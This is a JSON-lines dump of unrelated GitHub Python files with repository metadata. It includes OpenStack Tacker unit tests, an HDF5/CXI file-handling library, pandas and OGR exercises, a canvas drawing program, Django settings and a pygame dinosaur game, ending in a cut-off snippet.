self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n sn.set_callback(None)\n\n mock_inst.return_value = objects.VnfInstanceV2.from_dict(_inst1)\n sn.notify(self.request, 'test_id', body=_body)\n\n def test_notify_error_schema(self):\n self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n self.assertRaises(\n sol_ex.ServerNotificationValidationError,\n sn.notify, self.request, 'test_id')\n\n def test_constructor_error(self):\n self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n self.assertRaises(\n SystemError,\n server_notification.ServerNotification)\n\n def test_constructor_stub(self):\n self.config_fixture.config(\n group='server_notification', server_notification=False)\n server_notification.ServerNotification._instance = None\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n self.assertIsInstance(sn._instance, mon_base.MonitoringPluginStub)\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n self.assertIsInstance(sn._instance, mon_base.MonitoringPluginStub)\n\n def test_monitoring_plugin(self):\n mon_base.MonitoringPluginStub._instance = None\n mon = mon_base.MonitoringPlugin.get_instance(\n mon_base.MonitoringPluginStub)\n mon.set_callback(None)\n mon.create_job()\n mon.delete_job()\n mon.alert()\n\n def test_monitoring_plugin_stub(self):\n mon_base.MonitoringPluginStub._instance = None\n mon_base.MonitoringPlugin.get_instance(\n mon_base.MonitoringPluginStub)\n mon = mon_base.MonitoringPlugin.get_instance(\n mon_base.MonitoringPluginStub)\n mon.set_callback(None)\n mon.create_job()\n mon.delete_job()\n mon.alert()\n self.assertRaises(\n SystemError,\n mon_base.MonitoringPluginStub)\n","repo_name":"openstack/tacker","sub_path":"tacker/tests/unit/sol_refactored/common/test_server_notification.py","file_name":"test_server_notification.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"3"} +{"seq_id":"27069928033","text":"# -*- coding: utf-8 -*-\n#\n#\tCFEL file handling tools\n#\tAnton Barty\n#\n\nimport os\nimport sys\nimport csv\nimport h5py\nimport glob\nimport numpy as np\n\n\n# Needed for dialog_pickfile()\nimport PyQt4\nimport PyQt4.QtGui\nqtApp = PyQt4.QtGui.QApplication(sys.argv)\n\n\ndef dialog_pickfile(write=False, directory=False, multiple=False, path=False, filter='*.*'):\n \"\"\"\n :param write:\n :param directory:\n :param multiple:\n :param path:\n :param filter:\n :return:\n See: http://doc.qt.io/qt-4.8/qfiledialog.html\n \"\"\"\n QtWin= PyQt4.QtGui.QMainWindow()\n\n if path==False:\n path= ''\n\n if write==True:\n caption = 'Select destination file'\n file = PyQt4.QtGui.QFileDialog.getSaveFileName(QtWin, caption, path, filter)\n return file\n\n elif directory==True:\n caption = 'Select directory'\n dirname= PyQt4.QtGui.QFileDialog.getExistingDirectory(QtWin, caption, path)\n return dirname\n\n elif multiple==True:\n caption = 'Select Files'\n files = PyQt4.QtGui.QFileDialog.getOpenFileNames(QtWin, caption, path, filter)\n return files\n\n else:\n caption = 'Select File'\n file = PyQt4.QtGui.QFileDialog.getOpenFileName(QtWin, caption, path, filter)\n return file\n#end dialog_pickfile()\n\n\n\ndef file_search(pattern, recursive=True, iterator=False):\n \"\"\"\n :param pattern:\n :param recursive: True/False (default=True, '**' matches directories)\n :param iterator:\n :return:\n \"\"\"\n if iterator:\n files = glob.iglob(pattern, recursive=recursive)\n else:\n files = glob.glob(pattern, recursive=recursive)\n return files\n#end file_search()\n\n\ndef read_h5(filename='', field=\"/data/data\"):\n \"\"\"\n Read a simple HDF5 file\n\n if n_elements(filename) eq 0 then $\n filename = dialog_pickfile()\n \"\"\"\n\n # Open a file selection dialog if no filename is provided\n if filename == '':\n filename = dialog_pickfile()\n if filename == '':\n return\n\n\n # Open HDF5 file\n fp = h5py.File(filename, 'r')\n\n # Read the specified field\n data = fp[field][:]\n\n # Close and clean up\n fp.close()\n\n # return\n return data\n# end read_h5\n\n\n\n\ndef write_h5(filename, field=\"data/data\", compress=3):\n \"\"\" \n Write a simple HDF5 file\n\n IDL code\n \tif n_elements(filename) eq 0 then begin\n\t\tprint,'write_simple_hdf5: No filename specified...'\n\t\treturn\n\tendif\n\t\n\tif n_elements(data) eq 0 then begin\n\t\tprint,'write_simple_hdf5: No data specified...'\n\t\treturn\n\tendif\n\tdim = size(data,/dimensions)\n\t\n\t\n\tif not keyword_set(compress) then begin\n\t\tcompress=3\n\tendif\n\t\n\n\t;; HDF5 compression chunks\n\tchunksize = dim\n\tif n_elements(dim) ge 3 then $\n\t;;\tchunksize[0] = dim[0]/8;\n\t;;\tchunksize[0:n_elements(chunksize)-3] = 1\n\n\t\n\tfid = H5F_CREATE(filename) \n\tgroup_id = H5G_CREATE(fid, 'data')\n\tdatatype_id = H5T_IDL_CREATE(data) \n\tdataspace_id = H5S_CREATE_SIMPLE(dim) \n\n\tif (compress eq 0) then begin\n\t\tdataset_id = H5D_CREATE(fid,'data/data',datatype_id,dataspace_id) \n\tendif else begin\n\t\t;; GZIP keyword is ignored if CHUNK_DIMENSIONS is not specified.\n\t\tdataset_id = H5D_CREATE(fid,'data/data',datatype_id,dataspace_id, gzip=compression, chunk_dimensions=chunksize) \n\t\t;dataset_id = H5D_CREATE(fid,'data/data',datatype_id,dataspace_id, chunk_dimensions=chunksize, gzip=compression, /shuffle) \n\tendelse\n\n\tH5D_WRITE,dataset_id,data \n\tH5D_CLOSE,dataset_id \n\tH5S_CLOSE,dataspace_id \n\tH5T_CLOSE,datatype_id \n\tH5G_CLOSE,group_id\n\tH5F_CLOSE,fid \n \"\"\"\n# end write_h5\n\n\n#\n# Write selected dict keys to csv file\n#\n# Provide a list of keys to force consistent ordering\n# Order of keys in the dict can be different each time\n# Seriously - try it and see with print(dict.keys())\n#\ndef dict_to_csv(filename, dict, keys):\n\n ncol = len(keys)\n nrows = len(dict[keys[0]])\n\n # Check all keys are in the dict\n for k in keys:\n if not k in dict.keys():\n print(\"Error in dict_to_csv\")\n print(\"Requested key is not in dict\")\n print(\"Requested key: \", k)\n print(\"Available keys: \", dict.keys())\n return\n\n\n # Check all lines are the same length\n for k in keys:\n if len(dict[k]) != nrows:\n print(\"Error in dict_to_csv\")\n print(\"Dict element \", k, \"does not have the same dimensions\")\n print(\"nlines: \", k, ' = ', len(dict[k]))\n print(\"nlines: \", keys[0], ' = ', nrows)\n return\n #endif\n #endfor\n\n # Write columns with header row\n with open(filename, 'w') as f:\n #w = csv.writer(sys.stderr)\n w = csv.writer(f)\n w.writerow(keys)\n\n for row in range(0, nrows):\n str_out = []\n for k in keys:\n str_out.append(dict[k][row])\n\n w.writerow(str_out)\n #endfor\n\n f.close()\n #endwith\n#end dict_to_csv\n\n\n\n#\n# Read CSV file into a dictionary using the header row as dict entry names\n# Result will be a blank dict {} if file does not exist\n#\n# >>> import pandas as pd\n# >>> csv = pd.read_csv('example.csv')\n# >>> csv\n#\ndef csv_to_dict(filename):\n\n # Open CSV file\n result = {}\n\n with open(filename, 'r', newline='') as f:\n\n reader = csv.DictReader(f)\n\n for row in reader:\n for column, value in row.items():\n result.setdefault(column.strip(), []).append(value.strip())\n\n f.close()\n\n # Strip blanks from field names\n fieldnames = list(reader.fieldnames)\n for item, field in enumerate(fieldnames):\n fieldnames[item] = field.strip()\n\n # Add field names to dict\n result.update({'fieldnames' : fieldnames})\n\n return result\n#end csv_to_dict\n\n\n#\n# Read event data using the appropriate reader for the format\n#\ndef read_event(event_list, eventID, data=False, mask=False, peaks=False, photon_energy=False, camera_length=False, num_frames=False, slab_size=False):\n \"\"\"\n Read an event from file\n Calls file-reading function for different file formats as specified in the event list 'format' field\n :param event_list:\n :param eventID:\n :param data:\n :param mask:\n :param peaks:\n :param photon_energy:\n :param camera_length:\n :param num_frames:\n :param slab_size:\n :return:\n \"\"\"\n\n if event_list['format'][eventID] == 'cxi':\n event_data = read_cxi(event_list['filename'][eventID], event_list['event'][eventID], data=data, peaks=peaks, mask=mask, photon_energy=photon_energy, camera_length=camera_length, num_frames=num_frames, slab_size=slab_size)\n #end cxi\n\n elif event_list['format'][eventID] == 'cheetah_h5':\n data_array = read_h5(event_list['filename'][eventID], field=event_list['h5field'][eventID])\n event_data = {\n 'data': data_array,\n 'data_shape': data_array.shape,\n 'mask': [0],\n 'nframes': 1,\n 'EncoderValue': 0,\n 'photon_energy_eV': 0,\n 'n_peaks': 0,\n 'peakXPosRaw': [0],\n 'peakYPosRaw': [0]\n }\n #end cheetah_h5\n\n elif event_list['format'][eventID] == 'generic_h5':\n data_array = read_h5(event_list['filename'][eventID], field=event_list['h5field'][eventID])\n event_data = {\n 'data': data_array,\n 'data_shape': data_array.shape,\n 'nframes': 1,\n 'EncoderValue': 0,\n 'photon_energy_eV': 0,\n }\n #end generic_h5\n\n else:\n print(\"Unsupported file format: \", event_list['format'][eventID])\n exit(1)\n #end error\n\n\n return event_data\n\n\n\ndef read_cxi(filename, frameID=0, data=False, mask=False, peaks=False, photon_energy=False, camera_length=False, num_frames=False, slab_size=False):\n \"\"\" \n Read a frame from multi-event CXI file\n Also read mask and peak lists if requested\n Would be smarter to read the requested stuff at once and return it all at the same time from the same file handle\n :param filename:\n :param frameID:\n :param mask:\n :param peaks:\n :param photon_energy:\n :param camera_length:\n :param slab_size:\n :return:\n \"\"\"\n\n # Open CXI file\n hdf5_fh = h5py.File(filename, 'r')\n\n\n # Peak list\n if peaks == True:\n n_peaks = hdf5_fh['/entry_1/result_1/nPeaks'][frameID]\n peakXPosRaw = hdf5_fh['/entry_1/result_1/peakXPosRaw'][frameID]\n peakYPosRaw = hdf5_fh['/entry_1/result_1/peakYPosRaw'][frameID]\n peak_xy = (peakXPosRaw.flatten(), peakYPosRaw.flatten())\n else:\n n_peaks = 0\n peakXPosRaw = np.nan\n peakYPosRaw = np.nan\n\n\n # Masks\n if mask == True:\n mask_array = hdf5_fh['/entry_1/data_1/mask'][frameID, :, :]\n else:\n mask_array = np.nan\n\n\n # Photon energy\n if photon_energy == True:\n photon_energy_eV = hdf5_fh['/LCLS/photon_energy_eV'][frameID]\n #return photon_energy_eV\n else:\n photon_energy_eV = 'nan'\n\n\n # Camera length\n if camera_length == True:\n EncoderValue = hdf5_fh['/LCLS/detector_1/EncoderValue'][frameID]\n else:\n EncoderValue = 'nan'\n\n # Array dimensions\n if slab_size == True:\n size = hdf5_fh['/entry_1/data_1/data'].shape\n data_shape = size[1:]\n else:\n size = [0,0,0]\n data_shape = [0,0]\n\n # Number of frames\n if num_frames == True:\n # For files which have finished being written this can be inferred from the data array shape\n # For files still being written there are blank frames at the end, so look for non-zero entries in x_pixel_size\n # The minimum of these two values is the number of events actually written so far\n size = hdf5_fh['/entry_1/data_1/data'].shape\n nframes_1 = size[0]\n\n pix_size = hdf5_fh['entry_1/instrument_1/detector_1/x_pixel_size'][:]\n nframes_2 = len(np.where(pix_size != 0 )[0])\n\n nframes = np.min([nframes_1, nframes_2])\n else:\n nframes = -1\n\n # Image data\n if data == True:\n data_array = hdf5_fh['/entry_1/data_1/data'][frameID, :, :]\n data_shape = data_array.size\n else:\n data_array = np.nan\n\n\n # Close file\n hdf5_fh.close()\n\n\n # Build return structure\n result = {\n 'data' : data_array,\n 'data_shape' : data_shape,\n 'stack_shape' : size,\n 'mask' : mask_array,\n 'nframes' : nframes,\n 'EncoderValue' : EncoderValue,\n 'photon_energy_eV' : photon_energy_eV,\n 'n_peaks' : n_peaks,\n 'peakXPosRaw' : peakXPosRaw,\n 'peakYPosRaw' : peakYPosRaw\n }\n return result\n# end read_cxi\n\n\n\n\ndef list_events(pattern='./*.cxi', field='data/data'):\n \"\"\"\n :param file_pattern: Single filename, or search string\n :param field: HDF5 field from which to draw data, can be different for each file, default='data/data'\n :return: List of filenames, eventID and HDF5 field\n\n reload:\n import importlib\n importlib.reload(lib.cfel_filetools)\n from lib.cfel_filetools import *\n \"\"\"\n\n # \"field==none\" means \"use default value\"\n if field=='none':\n field = 'data/data'\n\n # Find all files matching pattern\n files = glob.glob(pattern, recursive=True)\n if len(files) == 0:\n print('No files found matching pattern: ', pattern)\n\n # List the found files (sanity check)\n #print('Found files:')\n #for filename in glob.iglob(pattern, recursive=True):\n # print(filename)\n\n # Create empty event list\n filename_out = []\n eventid_out = []\n fieldname_out = []\n format_out = []\n\n\n #print('Found files:')\n for filename in glob.iglob(pattern, recursive=True):\n\n basename = os.path.basename(filename)\n dirname = os.path.dirname(filename)\n #print(dirname, basename)\n\n # CXI file\n if filename.endswith(\".cxi\"):\n # Number of events in file\n nframes = read_cxi(filename, num_frames=True)['nframes']\n if nframes == 0:\n filename_short = basename\n print(filename_short, ' ', nframes)\n continue\n\n # Default location for data in .cxi files is not data/data\n # But leave option for passing a different hdf5 data path on the command line\n cxi_field = field\n if cxi_field == 'data/data':\n cxi_field = '/entry_1/data_1/data'\n\n # Generate lists for this file\n cxi_filename = [filename] * nframes\n cxi_eventid = list(range(nframes))\n cxi_fieldname = [cxi_field] * nframes\n cxi_format = ['cxi'] * nframes\n\n # Append to main list\n filename_out.extend(cxi_filename)\n eventid_out.extend(cxi_eventid)\n fieldname_out.extend(cxi_fieldname)\n format_out.extend(cxi_format)\n #endif\n\n # Assume .h5 file is a single frame data file (for now)\n # Be more clever about generalising this later on\n # (eg: if number of dimensions of field = 2, it's an image; if number of dimensions = 3 it's a slab)\n if basename.endswith(\".h5\") and basename.startswith(\"LCLS\"):\n nframes = 1\n filename_out.extend([filename])\n eventid_out.extend([0])\n fieldname_out.extend(['data/data'])\n format_out.extend(['cheetah_h5'])\n #endif\n\n elif basename.endswith(\".h5\"):\n nframes = 1\n filename_out.extend([filename])\n eventid_out.extend([0])\n fieldname_out.extend([field])\n format_out.extend(['generic_h5'])\n #endif\n\n\n #filename_short = filename.split('/')[-1]\n filename_short = basename\n print(filename_short, ' ', nframes)\n\n\n #endfor\n\n nevents = len(filename_out)\n #print('Events found: ', nevents)\n\n\n # Build return structure\n result = {\n 'nevents' : nevents,\n 'filename': filename_out,\n 'event': eventid_out,\n 'h5field': fieldname_out,\n 'format': format_out\n }\n return result\n\n# end find_cheetah_images\n\n\n","repo_name":"antonbarty/cheetah-2017","sub_path":"python/lib/cfel_filetools.py","file_name":"cfel_filetools.py","file_ext":"py","file_size_in_byte":14038,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"15143156506","text":"'''\n\n Merge reshaped and hosts using an inner join. Remember, how='inner' is the default behavior for pd.merge().\n Print the first 5 rows of the DataFrame merged. This has been done for you. You should see that the rows are jumbled chronologically.\n Set the index of merged to be 'Edition' and sort the index.\n Print the first 5 rows of the DataFrame influence. This has been done for you, so hit 'Submit Answer' to see the results!\n\n'''\n# Import pandas\nimport pandas as pd\n\n# Merge reshaped and hosts: merged\nmerged = pd.merge(reshaped, hosts)\n\n# Print first 5 rows of merged\nprint(merged.head())\n\n# Set Index of merged and sort it: influence\ninfluence = merged.set_index('Edition').sort_index()\n\n# Print first 5 rows of influence\nprint(influence.head())\n","repo_name":"JohnnyFang/datacamp","sub_path":"10-Merging-DataFrames-with-Pandas/04-case-study-Summer-Olympics/09-merging-to-compute-influence.py","file_name":"09-merging-to-compute-influence.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70146149522","text":"from __future__ import print_function, division, absolute_import\n\n# Copyright (c) 2016 Red Hat, Inc.\n#\n# This software is licensed to you under the GNU General Public License,\n# version 2 (GPLv2). There is NO WARRANTY for this software, express or\n# implied, including the implied warranties of MERCHANTABILITY or FITNESS\n# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2\n# along with this software; if not, see\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\n#\n# Red Hat trademarks are not licensed under GPLv2. No permission is\n# granted to use or replicate Red Hat trademarks that are incorporated\n# in this software or its documentation.\n\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nimport platform\nimport mock\nfrom test.fixture import open_mock, OPEN_FUNCTION\n\nfrom rhsmlib.facts import collector, firmware_info\nfrom rhsmlib.facts.firmware_info import UuidFirmwareInfoCollector\n\n\nclass GetArchTest(unittest.TestCase):\n @mock.patch('platform.machine')\n def test_returns_arch(self, mock_machine):\n mock_machine.return_value = \"hello_arch\"\n arch = collector.get_arch()\n self.assertEqual(\"hello_arch\", arch)\n\n def test_returns_arch_override(self):\n with open_mock(content=\"hello_arch\"):\n arch = collector.get_arch(prefix=\"/does/not/exist\")\n self.assertEqual(\"hello_arch\", arch)\n\n def test_get_arch(self):\n self.assertEqual(platform.machine(), collector.get_arch())\n\n def test_get_platform_specific_info_provider(self):\n info_provider = firmware_info.get_firmware_collector(arch=platform.machine())\n self.assertTrue(info_provider is not None)\n\n\nclass GetNonDmiUuid(unittest.TestCase):\n def test_get_aarch64_firmware_collector(self):\n firmware_provider_class = firmware_info.get_firmware_collector(arch='aarch64')\n self.assertTrue(isinstance(firmware_provider_class, UuidFirmwareInfoCollector))\n\n @mock.patch(OPEN_FUNCTION, mock.mock_open(read_data=\"356B6CCC-30C4-11B2-A85C-BBB0CCD29F36\"))\n def test_get_aarch64_uuid_collection(self):\n firmware_provider_class = firmware_info.get_firmware_collector(arch='aarch64')\n firmware_provider_class.arch = 'aarch64'\n result = firmware_provider_class.get_all()\n self.assertTrue(result['dmi.system.uuid'] == '356B6CCC-30C4-11B2-A85C-BBB0CCD29F36')\n\n def test_get_aarch64_uuid_collection_no_file(self):\n mock.mock_open(read_data=\"no file\")\n mock.mock_open.side_effect = IOError()\n firmware_provider_class = firmware_info.get_firmware_collector(arch='aarch64')\n firmware_provider_class.arch = 'aarch64'\n result = firmware_provider_class.get_all()\n self.assertTrue('dmi.system.uuid' not in result)\n","repo_name":"Lorquas/rhsm","sub_path":"test/rhsmlib_test/test_collector.py","file_name":"test_collector.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34442523854","text":"import numpy as np\nfrom PIL import Image\n\ncolor_lookup = {\n 'Red': (255, 0, 0),\n 'Green': (0, 255, 0),\n 'Blue': (0, 0, 255),\n 'White': (255, 255, 255),\n 'Black': (0, 0, 0),\n 'Yellow': (255, 255, 0),\n 'Cyan': (0, 255, 255),\n 'Magenta': (255, 0, 255),\n 'Silver': (192, 192, 192),\n 'Gray': (128, 128, 128),\n 'Maroon': (128, 0, 0),\n 'Olive': (128, 128, 0),\n 'Purple': (128, 0, 128),\n 'Teal': (0, 128, 128),\n 'Navy': (0, 0, 128),\n}\n\n\nclass Canvas:\n def __init__(self, width, height, color):\n self.width = width\n self.height = height\n self.color = color\n\n def make(self):\n canvas_array = np.zeros((self.height, self.width, 3), dtype=np.uint8)\n if self.color not in color_lookup.keys():\n raise KeyError('Color not supported')\n\n canvas_array[:, :] = color_lookup[self.color]\n return canvas_array\n\n\nclass Rectangle:\n def __init__(self, x, y, width, height, color):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.color = color\n\n def draw(self, canvas_array):\n canvas_array[self.x: self.x + self.width, self.y: self.y + self.height] = color_lookup[self.color]\n\n\nclass Square:\n def __init__(self, x, y, side, color):\n self.x = x\n self.y = y\n self.side = side\n self.color = color\n\n def draw(self, canvas_array):\n canvas_array[self.x: self.x + self.side, self.y: self.y + self.side] = color_lookup[self.color]\n\n\ndef visualize(canvas_array):\n image = Image.fromarray(canvas_array, 'RGB')\n image.save('canvas.png')\n\n\ncanvas_w = int(input('Please enter a canvas width'))\ncanvas_h = int(input('Please enter a canvas height'))\ncanvas_c = input('Enter a Canvas color: e.g. Black')\ncanvas = Canvas(canvas_w, canvas_h, canvas_c).make()\n\nshape_selector = input('What would you like to draw? square, rectangle, quit')\nwhile shape_selector != 'quit':\n if shape_selector not in ('rectangle', 'square'):\n shape_selector = input('please select from one of square, rectangle, quit')\n elif shape_selector == 'rectangle':\n rect_x = int(input('Enter the starting x coordinate of the rectangle'))\n rect_y = int(input('Enter the starting y coordinate of the rectangle'))\n rect_w = int(input('Enter the width of the rectangle'))\n rect_h = int(input('Enter the height of the rectangle'))\n rect_c = input('Enter the color of the rectangle')\n rect = Rectangle(rect_x, rect_y, rect_w, rect_h, rect_c)\n rect.draw(canvas)\n else:\n sq_x = int(input('Enter the starting x coordinate of the Square'))\n sq_y = int(input('Enter the starting y coordinate of the Square'))\n sq_s = int(input('Enter the side of the Square'))\n sq_color = input('Enter the color of the Square')\n sq = Square(sq_x, sq_y, sq_s, sq_color)\n sq.draw(canvas)\n shape_selector = input('What would you like to draw? square, rectangle, quit')\n\nvisualize(canvas_array=canvas)\n\n\n","repo_name":"tonys20/math_painter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73500337361","text":"from .base import *\n\n# SECURITY WARNING: don't run with debug turned on in production!\n# Override the default settings for the development environment\n\nDEBUG = False\n\nADMIN_ENABLED = False\n\nDATABASES = {\"default\": {\"ENGINE\": \"djongo\", \"NAME\": \"mantis\"}}\n","repo_name":"GlencoeDev/Mantis","sub_path":"mantisapi/mantisapi/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40920624961","text":"# -*- coding: utf-8 -*-\n__author__ = 'voirin'\n\n# j'importe OGR\nfrom osgeo import ogr, osr\n\n# Je déclare un système de coordonnées (wgs84)\nspatialReference = osr.SpatialReference()\nspatialReference.ImportFromEPSG(4326)\n\n# je déclare le chemin du fichier à écrire\npath=r'../data/points.shp'\n# je déclare le driver que je veux utiliser\ndriver = ogr.GetDriverByName('ESRI Shapefile')\n# je créé un datasource pour mes données\nshapeData = driver.CreateDataSource(path)\n# je créé une couche de points\nlayer = shapeData.CreateLayer('customs',spatialReference, ogr.wkbPoint)\n\n# je recherche la définition de la couche(attributs)\nlayer_defn = layer.GetLayerDefn()\n# je définis un attribut (nom et type)\nnew_field= ogr.FieldDefn('NAME', ogr.OFTString)\n# je l'ajoute à la couche\nlayer.CreateField(new_field)\n\n# afin de réduire le code, je vais déclarer un tableau avec les informations à écrire pour chaque point\npoints = [\n {'lat': 45.399896, 'lon': -71.884232, 'name': 'Sherbrooke'},\n {'lat': 45.536896, 'lon': -73.510551, 'name': 'Longueuil'}\n ]\ncnt = 0\nfor p in points:\n # je déclare mon objet point\n point = ogr.Geometry(ogr.wkbPoint)\n # voici mon point\n point.AddPoint(p['lon'], p['lat'])\n # voici son index\n featureIndex = cnt\n # je créé l'entité avec la définition des attributs\n feature = ogr.Feature(layer_defn)\n # je lui associe une géométrie\n feature.SetGeometry(point)\n # je définis l'index\n feature.SetFID(featureIndex)\n # je vais ajouter la valeur d'un attribut\n feature.SetField(\"NAME\",p['name'])\n # j'ajoute l'entité a la couche\n layer.CreateFeature(feature)\n cnt += 1\n\n# je termine l'édition\nshapeData.Destroy()","repo_name":"yvoirin/cookbook_python3","sub_path":"Creating files/write_shpfile.py","file_name":"write_shpfile.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"fr","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"74210119440","text":"# 8) Write a python program to find the longest words\r\n\r\nfl=open('std.txt','a')\r\n\r\nfl.write(\"Hi....\")\r\nfl.write(\"\\n My Name Is Sanjay\")\r\nfl.write(\"\\n I From DevBhumiDwarka\")\r\nfl.write(\"\\n My Hobbie Is Playing Cricket\")\r\nfl.write(\"\\n I love to Traveling\")\r\nfl.close()\r\n\r\nfl=open('std.txt','r+')\r\nlw=fl.read().split()\r\nlnw=len(max(lw, key=len))\r\nresult=[textword for textword in lw if len(textword) == lnw]\r\nprint(result)","repo_name":"Sanjay000008/26Apr_Assignment_modual4","sub_path":"assign_modual_4/8.logest_word.py","file_name":"8.logest_word.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44196673671","text":"import pygame\nimport time as tm\nfrom random import randint\n\npygame.init()\n\n# Queste sono le sprite\ndino = pygame.image.load('immagini/dino.png')\ndino2 = pygame.image.load('immagini/dino2.png')\ndino3 = pygame.image.load('immagini/dino3.png')\npavimento = pygame.image.load('immagini/pavimento.png')\ncactus = pygame.image.load('immagini/Cactus.png')\ncactus2 = pygame.image.load('immagini/Cactus2.png')\ncactus3 = pygame.image.load('immagini/Cactus3.png')\ncactus4 = pygame.image.load('immagini/Cactus4.png')\ncactusGroup = pygame.image.load('immagini/CactusGroup.png')\ncloud = pygame.image.load('immagini/cloud.png')\ngameOver = pygame.image.load('immagini/gameover.png')\n\n# Array con gli sprite\ncammina = [dino, dino, dino, dino2, dino2, dino2, dino3, dino3, dino3]\nostacoli = [cactus, cactus2, cactus3, cactus4, cactusGroup]\n\n# Costanti del gioco\nclock = pygame.time.Clock()\nlast_time = 0 #tm.time()\nSCHERMO = pygame.display.set_mode((600, 300))\npygame.display.set_caption(\"DinoGame! %d FPS\" % clock.get_fps())\nFPS = 60\nFONT = pygame.font.SysFont('Comic Sans MS', 20, bold=False)\n\n# Variabile booleana che per il main loop\nrunning = True\n\n\nclass Cloud:\n def __init__(self):\n self.x = 650\n self.y = randint(10, 150)\n\n def generate(self):\n self.x -= AVANZ * dt\n SCHERMO.blit(cloud, (self.x, self.y))\n\n\n# Classe Cactus\nclass Cactus:\n def __init__(self):\n self.x = 700\n self.y = randint(200, 210)\n self.rnd = randint(0, 4)\n\n def drawself(self):\n self.x -= AVANZ * dt\n SCHERMO.blit(ostacoli[self.rnd], (self.x, self.y))\n\n def collision(self, dino, dinox, dinoy):\n tollerance = 5\n dinodx = dinox + dino.get_width() - tollerance\n dinosx = dinox + tollerance\n cactusdx = self.x + ostacoli[self.rnd].get_width()\n cactussx = self.x\n dinoup = dinoy - tollerance\n dinodown = dinoy + dino.get_height() - tollerance\n cactusup = self.y\n cactusdown = self.y - 5\n if self.x <= -10:\n cacti.remove(self)\n if dinodx > cactussx and dinosx < cactusdx:\n if dinoup < cactusup and dinodown > cactusdown:\n gameover()\n\n\n# Inizializzo le variabili globali\ndef initialize():\n global dinox, dinoy, dinovely, jumping\n global pavx, pavy, pavx2, pavy2\n global walkpoint\n global cacti\n global score, time\n global DIFF\n global clouds\n global AVANZ\n # DIFF = pygame.event.Event(DIFF)\n # pygame.time.set_timer(DIFF, 10000)\n dinox, dinoy, dinovely, jumping = 70, 200, 0, False\n pavx, pavy = 0, 235\n walkpoint = 0\n AVANZ = 250\n cacti = [Cactus()]\n clouds = [Cloud()]\n score, time = 0, 0\n\n\n# Chiamo la funzione inizializza\ninitialize()\n\n\n# Definisco una funzione che aggiorna ogni frame lo schermo\ndef draw():\n SCHERMO.fill((255, 255, 255))\n SCHERMO.blit(pavimento, (pavx, pavy))\n SCHERMO.blit(pavimento, (pavx + 1200, pavy))\n for c in cacti:\n c.drawself()\n for i in clouds:\n i.generate()\n SCHERMO.blit(cammina[walkpoint], (dinox, dinoy))\n scoreRender = FONT.render(str(int(score)), 1, (0, 0, 0))\n SCHERMO.blit(scoreRender, (450, 10))\n\n\n# Qui definisco una funzione per creare un \"timer\" che manda avanti il gioco definendo i \"Tick\" del gioco\ndef update():\n pygame.display.update()\n clock.tick(FPS)\n\n\ndef gameover():\n SCHERMO.blit(gameOver, (200, 150))\n update()\n dead = True\n while dead:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n initialize()\n dead = False\n if event.type == pygame.QUIT:\n running = False\n dead = False\n quit()\n\n\n# Main loop del gioco, dove avvengono la maggior parte dei calcoli\nwhile running:\n t = pygame.time.get_ticks()\n dt = (t - last_time)/1000.0\n last_time = t\n\n score += 0.166\n time += 0.016\n pavx -= AVANZ * dt\n\n if pavx <= -1200:\n pavx = 0\n\n if time > 10:\n time = 0\n AVANZ *= 1.1\n if dinoy >= 200:\n jumping = False\n dinoy = 200\n dinovely = 0\n if jumping and dinoy <= 120:\n dinovely += 50 * dt\n walkpoint = 0\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n if not jumping:\n jumping = True\n dinovely = -500 * dt\n\n if event.type == pygame.QUIT:\n running = False\n\n dinoy += dinovely\n\n if walkpoint > 8:\n walkpoint = 0\n\n if cacti[-1].x < randint(-10, 200):\n cacti.append(Cactus())\n# if cacti[-1].x < -10:\n# cacti.pop(-2)\n if clouds[-1].x < -10:\n clouds.remove(clouds[-1])\n if len(clouds) > 0:\n if clouds[-1].x < randint(-10, 300):\n clouds.append(Cloud())\n\n for c in cacti:\n c.collision(dino, dinox, dinoy)\n\n draw()\n walkpoint += 1\n update()\n\n# In caso si clicchi la X per uscire dal gioco viene chiamato il method quit()\ndef quit():\n pygame.quit()\n","repo_name":"ronnye0802/GoogleDino","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11075572619","text":"#standardization and normalization\n\n\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\nex = pd.DataFrame([0,1,2,3,4,5])\nex[1] = (ex[0]-ex[0].mean())/ex[0].std(ddof=0)\nex[2] = 